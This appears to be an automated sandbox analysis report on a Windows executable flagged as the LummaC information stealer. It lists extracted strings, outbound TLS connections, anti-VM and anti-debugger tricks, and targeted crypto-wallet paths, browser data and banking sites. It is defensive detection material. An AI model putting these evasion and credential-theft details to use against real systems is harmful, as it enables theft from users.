              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
              Source: biyhoksefdad.exe, 00000000.00000003.1490545194.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: biyhoksefdad.exe, 00000000.00000003.1490545194.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: biyhoksefdad.exe, 00000000.00000003.1490545194.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: biyhoksefdad.exe, 00000000.00000003.1490545194.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: biyhoksefdad.exe, 00000000.00000003.1490545194.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: biyhoksefdad.exe, 00000000.00000003.1490545194.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:49722 version: TLS 1.2

              System Summary

              barindex
              PE file has nameless sections
              Source: biyhoksefdad.exeStatic PE information: section name:
              Source: biyhoksefdad.exeStatic PE information: section name:
              Source: biyhoksefdad.exeStatic PE information: section name:
              Source: biyhoksefdad.exeStatic PE information: section name:
              Source: biyhoksefdad.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_01002E7B0_3_01002E7B
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_01002E7B0_3_01002E7B
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_0100F0A70_3_0100F0A7
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_0100F0A70_3_0100F0A7
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FB9E110_3_00FB9E11
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FB9E110_3_00FB9E11
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FAE5E10_3_00FAE5E1
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FACBC20_3_00FACBC2
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FAE5B40_3_00FAE5B4
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_01002E7B0_3_01002E7B
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_01002E7B0_3_01002E7B
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_0100F0A70_3_0100F0A7
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_0100F0A70_3_0100F0A7
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FDA8D40_3_00FDA8D4
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FDAC4C0_3_00FDAC4C
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FB9E110_3_00FB9E11
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FB9E110_3_00FB9E11
              Source: biyhoksefdad.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: biyhoksefdad.exeStatic PE information: Section: ZLIB complexity 0.9997251590568862
              Source: biyhoksefdad.exeStatic PE information: Section: ZLIB complexity 0.996337890625
              Source: biyhoksefdad.exeStatic PE information: Section: .data ZLIB complexity 0.9970991290983606
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/3
              Source: C:\Users\user\Desktop\biyhoksefdad.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: biyhoksefdad.exe, 00000000.00000003.1448679075.0000000003CB0000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1398957135.0000000003D95000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1447247440.0000000003CC8000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1402899936.0000000003CBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: biyhoksefdad.exeReversingLabs: Detection: 68%
              Source: biyhoksefdad.exeVirustotal: Detection: 60%
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile read: C:\Users\user\Desktop\biyhoksefdad.exeJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: biyhoksefdad.exeStatic file information: File size 1312768 > 1048576

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\biyhoksefdad.exeUnpacked PE file: 0.2.biyhoksefdad.exe.a80000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
              Source: biyhoksefdad.exeStatic PE information: section name:
              Source: biyhoksefdad.exeStatic PE information: section name:
              Source: biyhoksefdad.exeStatic PE information: section name:
              Source: biyhoksefdad.exeStatic PE information: section name:
              Source: biyhoksefdad.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_01021C71 push ss; ret 0_3_01021C42
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_01021C71 push ss; iretd 0_3_01021CA2
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_0101EB98 push 7800FDCBh; retf 0_3_0101EB9D
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_0101EBA8 push A800FDCAh; retf 0_3_0101EBAD
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_0102ABBA push esp; retf 006Fh0_3_0102ABDE
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_01032875 push esp; retf 006Fh0_3_01032876
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FFD81E push edi; retf 0_3_00FFD831
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FFD81E push edi; retf 0_3_00FFD831
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FFCE1D push eax; retf 0_3_00FFCE45
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FFCE1D push eax; retf 0_3_00FFCE45
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FFCBBC push eax; retf 0_3_00FFCC61
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FFCBBC push eax; retf 0_3_00FFCC61
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FCF688 pushfd ; retf 0_3_00FCF689
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FCF688 pushfd ; retf 0_3_00FCF689
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FCF22A push ds; retf 0_3_00FCF299
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FCF22A push ds; retf 0_3_00FCF299
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FC7F74 push esp; retf 0_3_00FC7FF6
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FFD81E push edi; retf 0_3_00FFD831
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FFD81E push edi; retf 0_3_00FFD831
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FFCE1D push eax; retf 0_3_00FFCE45
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FFCE1D push eax; retf 0_3_00FFCE45
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FFCBBC push eax; retf 0_3_00FFCC61
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FFCBBC push eax; retf 0_3_00FFCC61
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FCF688 pushfd ; retf 0_3_00FCF689
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FCF688 pushfd ; retf 0_3_00FCF689
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FCF22A push ds; retf 0_3_00FCF299
              Source: C:\Users\user\Desktop\biyhoksefdad.exeCode function: 0_3_00FCF22A push ds; retf 0_3_00FCF299
              Source: biyhoksefdad.exeStatic PE information: section name: entropy: 7.998877241773601
              Source: biyhoksefdad.exeStatic PE information: section name: entropy: 7.929991287486017
              Source: biyhoksefdad.exeStatic PE information: section name: entropy: 7.936481889423268
              Source: biyhoksefdad.exeStatic PE information: section name: entropy: 7.924636797507748
              Source: biyhoksefdad.exeStatic PE information: section name: .data entropy: 7.983447049442333
              Source: C:\Users\user\Desktop\biyhoksefdad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\biyhoksefdad.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\biyhoksefdad.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeWindow / User API: threadDelayed 724Jump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exe TID: 8336Thread sleep count: 724 > 30Jump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exe TID: 8408Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exe TID: 8356Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D98000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: biyhoksefdad.exe, biyhoksefdad.exe, 00000000.00000003.1627352228.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1578141492.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709348151.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1541986119.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1541835345.0000000000FC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: biyhoksefdad.exe, 00000000.00000002.1708761696.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: &VBoxService.exe
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: biyhoksefdad.exe, 00000000.00000003.1627352228.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1578141492.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709348151.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1541986119.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1541835345.0000000000FC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: biyhoksefdad.exe, 00000000.00000002.1708761696.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VBoxService.exe
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: biyhoksefdad.exe, 00000000.00000002.1709148906.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh?
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: biyhoksefdad.exe, 00000000.00000002.1708761696.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~VirtualMachineTypes
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: biyhoksefdad.exe, 00000000.00000002.1708761696.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
              Source: biyhoksefdad.exe, 00000000.00000002.1708761696.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMWare
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: biyhoksefdad.exe, 00000000.00000002.1708761696.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\biyhoksefdad.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\biyhoksefdad.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: biyhoksefdad.exe, biyhoksefdad.exe, 00000000.00000003.1578283765.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1627470793.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1578283765.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1578391349.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1578141492.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1627650605.0000000000FB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\biyhoksefdad.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: biyhoksefdad.exe PID: 8332, type: MEMORYSTR
              Source: Yara matchFile source: 0.2.biyhoksefdad.exe.a80000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: biyhoksefdad.exeString found in binary or memory: llets/Electrum-LTC
              Source: biyhoksefdad.exeString found in binary or memory: Wallets/ElectronCash
              Source: biyhoksefdad.exeString found in binary or memory: window-state.json
              Source: biyhoksefdad.exeString found in binary or memory: Wallets/JAXX New Version
              Source: biyhoksefdad.exe, 00000000.00000003.1541835345.0000000000FF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: biyhoksefdad.exeString found in binary or memory: ExodusWeb3
              Source: biyhoksefdad.exeString found in binary or memory: Wallets/Ethereum
              Source: biyhoksefdad.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: biyhoksefdad.exeString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
